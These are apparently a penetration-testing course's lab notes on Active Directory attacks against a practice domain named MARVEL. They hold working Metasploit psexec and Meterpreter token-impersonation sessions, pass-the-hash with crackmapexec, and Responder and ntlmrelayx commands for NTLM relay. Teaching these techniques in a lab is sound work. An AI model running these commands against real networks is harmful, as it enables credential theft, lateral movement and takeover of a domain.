# Week 9: NTLM **Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided. ## Important Readings {% embed url="" %} {% embed url="" %} ## Notes ### CrackMapExec and psexec * install crackmapexec ![crackmapexec smb \ -u Administrator -p 'P@$$word!' -d MARVEL](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ0An9CtdMNWQejP8_%2F2020-08-21%2019_34_20-Window.png?alt=media\&token=6eac011d-6c36-4fd7-8d65-204e544d624c) * msf5 > use exploit/windows/smb/psexec ![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ0j6ZIYA1NgGG5bMA%2F2020-08-21%2019_36_52-Window.png?alt=media\&token=7c30a6d4-7c0b-4e10-97d9-73e1219922b5) * try all the target options for psexec: `set target 3` * Automatic * Powershell * Native Upload * MOF upload * sysinfo * x64 Architecture but 32-bit Meterpreter * you can look through payloads and find a better one sometime ``` meterpreter > load incognito meterpreter > list_tokens -u # users meterpreter > list_tokens -g # group meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > impersonate_token MARVEL\\Administrator [+] Delegation token available [+] Successfully impersonated user MARVEL\Administrator meterpreter > getuid Server username: MARVEL\Administrator meterpreter > shell ... C:\Windows\system32>whoami marvel\administrator ``` In meterpreter shell, type `load` and hit tab twice to see all the different things to load, e.g. kiwi, mimikatz ``` # with a meterpreter session running msf5 > use post/multi/recon/local_exploit_suggester msf5 post(post/multi/recon/local_exploit_suggester) > set session 1 msf5 post(post/multi/recon/local_exploit_suggester) > run ... # enter session msf5 > sessions 1 # check processes meterpreter > ps ``` * Process Migration, get a x64 Meterpreter shell ![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ4GZJP-pLD5Pg2Dto%2F2020-08-21%2019_52_18-Window.png?alt=media\&token=11a2334d-a86a-4cd5-9fba-a42869f0bf50) * Local Administrator account could be the same across many computers if IT images them from the same base image. * You can pass the hash with `crackmapexec -H` or with `psexec` ### NTLM Relay If communications are not digitally signed, you can NTLM relay. SMB signing is defaulted OFF. * Heath demonstrates environment were a user has administrative privileges on multiple machines. * Edited Responder.conf: Turned off SMB and HTTP server * Start `Responder.py -I eth0 -rdw` * Wait ![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ7F8GHKGTmbLFffoY%2F-MFJ8KlfytYa5sQErviV%2F2020-08-21%2020_10_02-Window.png?alt=media\&token=ec87f7e6-79d5-4319-bb20-e95f16a6a68e) ``` locate ntlmrelayx.py # it's in impacket python ntlmrelayx.py -tf target.txt -smb2support ``` * point a victim machine to yours to in File Explorer e.g. \\\192.168.202.173